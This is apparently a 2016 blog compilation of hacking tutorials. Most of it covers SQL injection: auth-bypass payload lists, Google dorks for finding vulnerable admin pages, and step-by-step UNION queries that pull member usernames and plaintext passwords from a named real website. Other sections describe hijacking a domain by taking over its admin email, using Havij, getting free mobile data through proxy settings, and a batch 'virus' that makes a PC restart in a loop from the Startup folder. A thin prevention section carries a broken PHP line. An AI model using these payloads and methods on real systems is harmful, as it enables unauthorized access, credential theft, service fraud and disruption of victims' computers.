Friday, 13 May 2016

Domain Hijacking – How to Hack a Domain Name

Domain Hijacking – How to Hack a Domain Name

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
  1. The domain registrar name for the target domain.
  2. The administrative email address associated with the target domain.
These information can be obtained by accessing theWHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup (you need to register to view administrative contact information). Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.

Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

sql injection attack

sql injection attack

Q what is sql injection?

A injecting sql queries into another database or using queries to get auth bypass as an admin.

part 1 : Basic sql injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


there are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.

So your input should look like this

username:Admin
password:'or'1'='1

So click submit and you'r in
NOTE not all sites are vulnerable.


part 2: injecting sql queries to extract the admin username and password

ok so lets say we have a site :
http://www.xxxxx.com/index.php?catid=1
there is a list of dork 4 sites lyk this

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
or the best in my view "full credit to qabandi for discovering this"
"inurl:".php?catid=" site:xxx"


So once you have you'r site
http://www.xxxx.com/index.php?catid=1
now we add a ' to the end of the url
so the site is
http://www.xxxx.com/index.php?catid=1'
if there is an error of some sort then it is vulnerable
now we need to find the number of columns in the sql database
so we type
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"

so this database has 4 columns because we got an error on 5
on some databases there is 2 columns and on some 200 it varies
so once we have the column number.
we try the union function
http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
so now we need to info about the db
so lets say the numbers 2 and 4 showed up on the screen
so i will use my query on 2
http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
the db type and version will pop up on the screen
if the db version is 4 or lower then to extract the password you will need these queries
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
this should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
then type
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
then once u have the right table name you should get the administrator password
then just do the same thing but type username instead of password
sometimes the password is hashed and you need to crack it.
then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de..../admin_1.2_.txt
now if the database is version 5 or up
type
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables
once you have your table name
type the same thing as 4
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
then the same with username
but now if it doesnt work far all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

sql injection cheat sheet

sql injection cheat sheet

'or''='

1 OR 1=1

1' OR '1'='1

' or 1=1 or ''='

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

What is a sql injection

What is a sql injection

What is SQL Injection?
SQL Injection - \S-Q-L-in-'jek-shen\ - Noun
The technique of inputting malicious data into an SQL statement, which would therefore make the vulnerability present on the database layer.

What It Looks Like?
The vast majority of all SQL injections will take place on an input form.
The most basic of all SQL injections will look like the following:

The Basic SQL injection is :


Quote:
Variable' or 1=1--


Let’s say we have a login form. By inputting the above code, we can use our SQL injection to gain login even without proper credentials!

How’s it work?
Take a look..


Code:
SELECT * FROM users WHERE username = 'Variable' or 1=1--'



See how our code is nicely injected into the query? The result of this query will grant us access regardless of the username, since the result of “1=1? will always be true. In this case, we bypass the whole selection process.

You may have been wondering what the double dashes are for ( — ). These dashes at the end tell the SQL server to ignore the rest of the query. If the exploit isn’t being used on an SQL server, then omitting the double dashes and ending single quote will get the desired results.

Note that while this is the most standard way, it certainly isn’t the only way that malicious users will gain entry. SQL queries will differ greatly from one syntax to another.
It’s also common to see the following:


Code:
') or ('1'='1
"or "1"="1
' or '1'='1
Or 1=1--
" or 1=1--
' or 1=1--



SQL Injection: Attacking Via URLs
As we know it is possible to attack an SQL server through URL and usually much more dangerous to webmasters.
When using PHP and SQL, there is commonly a URL such as the following:


Code:
http://YourWebsite.com/page.php?id=2



By adding a little SQL to the end of the URL, we can attack on SQL server..

I think this is enough, Now Let’s finally find out how to secure your website from SQL injection.


SQL Injection Prevention: Editing Lengths Of Form Components
The first step in the process is simple: simply restrict input fields to the absolute minimum- usually anywhere from 7-12 characters is fine. Doing so will make long queries unable to be input, since the field is only enough characters for smaller queries. This will actually not prevent an SQL injection, but will make work harder for those trying to make use of one.

Note :SQL injection users can simply make a new form and remove the limits on the character length, since the length is in plain HTML and viewable (and editable) by anyone.

SQL Injection Prevention: Data Type Validation
Another good idea is to validate any data once it is received. If a user had to input an age, make sure the input is an actual number. If it was a date, make sure the date is in proper format. Again, this will not prevent an SQL injection in itself- it just makes work harder for those trying to exploit an SQL server.

Note: This is still only slowing attackers down- but isn’t it much more satisfying to have them waste their time before finding out one’s own query is impervious to harm?

SQL Injection Prevention: The Solution In Preventing SQL Attacks
We’ll accomplish this with a simple function that the developers of PHP made especially for SQL injections. We call this function mysql_real_escape_string() - take a look at it below:

Code:
$name = "John";
$name = mysql_real_escape_string($name);
$SQL = "SELECT * FROM users WHERE username = '$name'";



Although for a more practical use, we would have the $name variable pointed to a POST result, as seen below:

Code:
$name = mysql_real_escape_string($_POST['user']);



And we can even make things easier by putting it into one line:

Code:
$SQL = "SELECT * FROM users where username = "mysql_real_escape_string($POST['user']);



So what’s the output like if malicious users try to get access to our SQL server?
Their attempts may look something like this:


Code:
$malcious_input = "' OR 1'";
// The Above Is The Malicious Input. Don't Be Scared!
// With The mysql_real_escape_string() usage, the following is obtained:

\' OR 1\'
// Notice how the slashes escape the quotes! Now users can't enter malicious data



And the best part is, they just wasted their time and effort for nothing.

Lastly, note that there are libraries and classes that can help aid in the fight against SQL injection. Prepared statements are plausible as well, but as for us, we enjoy sticking to the mysql_real_escape_string() function for less headaches.

sql injection tutorial with examples

sql injection tutorial with examples

SQL INJECTION:
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user
input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.


Imagine that you found this site:

http://www.guitarists.net/



Now 1st of all we need to Find the url like this to test sql injection.

id=xyz



Okay suppose we are going with this url

http://www.guitarists.net/links/list.php?id=253



To test the file that has the variable list.php id badly planned, and if we fit in a simple, 'and give us an error identical to that

http://www.guitarists.net/links/list.php?id=253



'



Error:

Quote:
Fatal error: Call to undefined method DB_Error::numRows() in /home/gnet/public_html/links/list.php on line 57


Now we will explore it.


The First Step of all, and find out how many columns have, as we get the correct column, we'll see something different


Code:
Code:
-1+union+select+



This is the basic syntax for this example of attack, but of course you can be
done differently, but I find this easier to start.

Keep Adding Numbers to guess the Correct colunms like this

http://www.guitarists.net/links/list.php?id=-1+union+select+0-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3,4-- [(:]



Beat the SQL error here, here and found that the web, has 4 columns!

Also appears to us the number 1, that is, we know that the column 1 are vulnerable, and it is through them that we are going for a steal information
So now we know, we have 4 columns and column 1 is vulnerable, we will use.

Information_Schema.Tables

table_name & information_schema.tables--



It helps us to Find the table names. Now our Link Would be Like This

http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--



Replacing the vulnerable column 1 in the string table_name.


Note: Here you can see all table, but not always that happens in certain websites, so we can see one by one, and for this you use the term +limit+*,1--

Like:

http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10+from+information_schema.tables+limit+0,1--
...



Well continuing with our web ...

http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--



As we can see there are a lot of tables, but have doubt, is the table members! because we have to stole data from members. admin, administrators etc.

As we can see there is no table like Administrator or admin so now we will try to Explore members and check it What info it has
Now we need to see the columns that the table has for so we used the syntax.

column_name &
information_schema.columns



And our url will be like this.

http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--



Don't confuse going to Explain it now :-j

+where ---> Where?
+table_name= ---> Name of Table?
char() ---> Name of Table in ASCII


e.g:

Code:

Code:
m = 109
e = 101
m = 109
b = 98
e = 101
r = 114
s = 115



Google it "Table in ASCII" you will get the whole table.

Well, now let's find out what we see in

http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--



w0w we succeeded to grab the required info.

Cheers!!

Well, what interests us and the column

Login and password that it is ..

Well, now we make the final injection, the data to steal login and password

The injection is made of the following way ..

To see Login:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,strUsername,2,3,4+from+members--



To see Passwords:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,strPassword,2,3,4+from+members--



There is a much simpler method, which is to see everything
at the same time using the syntax.

concat( )



well, concat serves to unite all at once, then our url would be like this:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,concat(strUsername,0x3a,strPassword),2,3,4+from+members--



Quote
0x3a -> Hexadecimal code, used to insert : between one and another, not to be confused


All Passwords are in text-plain not in hash!

Hope this tutorial helps you to learn sql injection. And to understand different techniques related to sql injection.

This Tutorial is Written for Educational purpose, I am not responsible if anyone use it for illegal purpose. 

Hacking website with SQL Injection

Hacking website with SQL Injection

First of all you need to know about sql. sql stands for structured query language. Now like every language it has some keywords such as SELECT,FROM,WHERE etc. Than how these keywords work, suppose there is a database which contain tables of user's profile. This table has table name,fields,unique key etc. If we write the following code
query =  SELECT * FROM user_data WHERE user_id = + geturlParameter("userid")
this code means select all details from user_data table where unique id is which is taken from URL parameter.
From above reading we have little bit knowledge of how SQL works so we can now move further.

Injection 
Injection flaws such as SQL,OS, and LDAP injection, occur when untrusted data is sent to an interpreter as a part of command query. The attacker's hostile data can trick the interpreter for executing or accessing unauthorized data.
This injected data could be anything, however usually and commonly these attack uses any part of application that is passed on user-supplied data or poorly processed data to sql database.
sql injection attacks are not the sole target of injection attacks, other interpreter such as LDAP, XPath etc can also be exposed in same way.

How sql injection works
Imagine a web application that uses a database query supplied by user such a scenario is very common in fact it is the basis of dynamic website. Here suppose that your id is 32. So if you were looking at your own profile page on website, in the back end it would be constructing query such as:
SELECT * FROM user_data WHERE user_id = + geturlParameter("userid")
One might expect the below URL to get input parameter[geturlParameter("userid")] by user:
http://www.somesite.com/profile.php?userid=32
Now depending on how the query is constructed it may or may not be susceptible to injection. Of course we will examine case where it is.
Here if we were to add sql code to the parameter "userid" in the request url, we could execute the website to that code. For example here we could do something like
http://www.somesite.com/profile.php?uderid=32;DROP important_table
DROP keyword means deleting in sql. Here in example DROP important_table means deleting table named important_table. With this small vulnerability whole database is lost.
So through this method you can change,update,extract data and many more on database can be executed.

How sql injection can be useful in hacking
In dynamic websites, database is created using MysSQl, where userid and passwords for particular user is stored in database and can be tricked using injecting sql commands.
For this you don't have to learn sql there are many software which can do this for you, some of which are Havij, Acunetix etc.
For checking vulnerability of your website Acunetix can be useful for you but for hacking passwords for vulnerable website use havij.

Hacking Website with havij
Havij

For sql injection, website url should be in below format so that havij can inject sql commands
http://www.target.com/index.asp?id=123 
Search for url and paste it in the field Target: and than click analyse button.
 After process of analysing target is complete, click on Tables button
 Than after checking the given keyword by clicking on it press Get Tables
 Now search for appropriate table name that should contain password such as its name can be login, admin etc.
After finding this table, check the box for that table and press Get Columns. This will show you all columns present in that table. As for example login table in selected in below given image.
 Here again search for appropriate column name that should contain password and check it. Now press Get Data and on right side you will get data for your selected fields. In below image user_id and user_password is selected and on the right we got the password and id. 

Use your USB flash drive as virtual RAM ( virtual memory optimization )

Use your USB flash drive as virtual RAM ( virtual memory optimization )

What is virtual memory? 
Virtual Memory is not the part of system hardware but it is only the virtual ram made on hard disk. In virtual memory space from hard disk is utilised for applications that are currently not in use. It is a very essential part of system software i.e. operating system. Amount of space available for virtual memory is known as swap memory that can be used for swapping files.
So virtual memory is the part of operating system which decides how to use hard disk space as ram.
How it works?
Now suppose your system have 512 MB or 1024 MB of ram and you are running four application simultaneously. Also your operating system services are running on that ram only, so now with four applications and system services your ram space is full, so in your next preceding order to system should say that your ram is full now but it never says that. Why is it so ?
This is because all the processes required for your recent activity or for application you are currently running are saved on the ram and all the processes that are not in use are transferred to virtual memory or swap memory so that it can be swapped with currently running data on ram whenever required.
How these functions have to occur are decided by the architecture of virtual memory made, which depends on the operating system that how it is designed to use swap memory. Space available for virtual memory can be decided and manually edited by user but it should be at least 1.5 times of ram size for significant performance.

Virtual Memory makes a image file on hard disk of the size same as virtual memory size and this file is know asPAGE FILE. On windows page file has .sys (system file) extension and this file can be seen by unhiding the protected system files. Here the image shown has XP set for 768 MB of initial virtual memory. 


And off course how the virtual memory perform will depend on the read/write speed of hard disk. If your system have enough ram to work with than the swap memory usage is very low so performance remains better but if your system doesn't have enough ram than utilization of swap memory increases which is called THRASHING and this greatly slows down your computer, this is because speed of hard disk is much slower than ram. This isn't mean that virtual memory is of no use it is of great importance for optimal performance but it can't replace your ram.

Optimizing system for best performance

What are conditions for best performance of your virtual ram. Firstly it should be 1.5 times of size of the ram. Suppose that your system have 1GB ram than your virtual memory should be set to 1.5GB of size. Secondly the device you are using for your virtual memory should have faster read/write speed than your hard disk otherwise there will be decrease in performance.
Now for using device as your virtual ram other than your hard disk than connect your device, suppose your device has assigned E alphabet and now follow the below steps:

  •  Go to my computer properties.
  • Click 'Advanced tab' and go to 'settings' under heading performance
  • Now again click 'Advanced tab' than click 'change'.
                               
  • Here you have to select 'no paging file' option for all drives and press set. Than select your device letter and select 'custom size' option and define initial and maximum size for virtual memory. Here maximum size should be 1.5 times of ram.
                               

Your external virtual memory device can be USB 2.0, external HDD, SSD, USB 3.0 etc. But as told it should be faster than your primary hard disk. You should use atleast USB 3.0 for significant performance increase,  also if you don't have USB 3.0 port buy the internal card for its support, as it is much faster than USB 2.0. If you don't want to buy the internal USB 3.0 card than use SSD drive as it can be connected to usb port. But the best option will be the express card if you have express port and you can afford it, it is presently the fastest external card.

Increase your internet speed (only firefox)

Increase your internet speed (only firefox)

Lets know it is possible or not to increase your Internet connection speed. Theoretically it is not possible as your connection has limited bandwidth but a slight increase in loading html pages is possible and there will  a significant change in video buffering time, time will considerably decreased.
How it works?
The technique because of which it is possible is HTTP pipelining. In HTTP pipelining technique multiple HTTP request are sent on a single TCP connection without waiting for corresponding response.   
The pipelining of request have dramatic improvement on loading times of html pages especially over high speed connections. The biggest example of pipelining is used by most of the Internet users, it is in the form of downloader. Down loader like DAP uses many connections simultaneously according to its profile.
So connecting with many simultaneous request to server can help you out. Follow the steps

Open your firefox.
Type about:config in the address bar
Here you have to change three values. Also there comes one field below the address bar named Filter.

1) Type network.http.pipelining.maxrequest in field filter
set its value to 50 or any other according to your connection speed.

2) Type network.http.proxy.pipelining and change its value to true by double clicking on it.

3) Type network.http.pipelining also change its value to true 

Now close your firefox and again open it and you should see a change especially in home page and buffering. Also if you have high latency connection than there will be huge change in your html pages load time.

Free internet hack for airtel gprs

Free internet hack for airtel gprs

Use the below mentioned settings on your mobile to access gprs but your phone should have zero balance to work with following trick.

connection name could be anything like xyz

access point name: airtelgprs.com

proxy server address: 99.158.160.201 or 200.57.88.167

proxy port number: 80

homepage: 203.115.112.5 or 202.46.201.112 or use airtel live as your home page

and its done enjoy free internet.

How to make a notepad virus

To create a virus using notepad you should know that notepad can be used as source file for batch file When we save notepad file as .bat or .cmd it becomes batch file.

Now you should know how to use command prompt. Such as here we are using commands for shutdown or restart.


Open command prompt and type in it shutdown. This will show you all shutdown parameters, some of which –s, –r and –a are for shutdown and restart respectively. 

Try using –s parameter first in command prompt. Open cmd and type shutdown –s. This will give you warning start countdown of 30sec to save your work.


To stop this countdown type shutdown –a .

Open your notepad and simply type shutdown –r and save it as xyzname.bat now double clicking this file will restart your computer. To auto initiate it, paste it in the startup folder in start>all programs>Startup.

Now after pasting whenever computer is started again, it will start restarting continuously. To stop this this use shutdown –a in cmd and delete that file from startup.

Featured post

Life Infotech now a leading brand in the field of technology training

  Life Infotech now a leading brand in the field of technology training & its invites students around the nation to be a part of the Tra...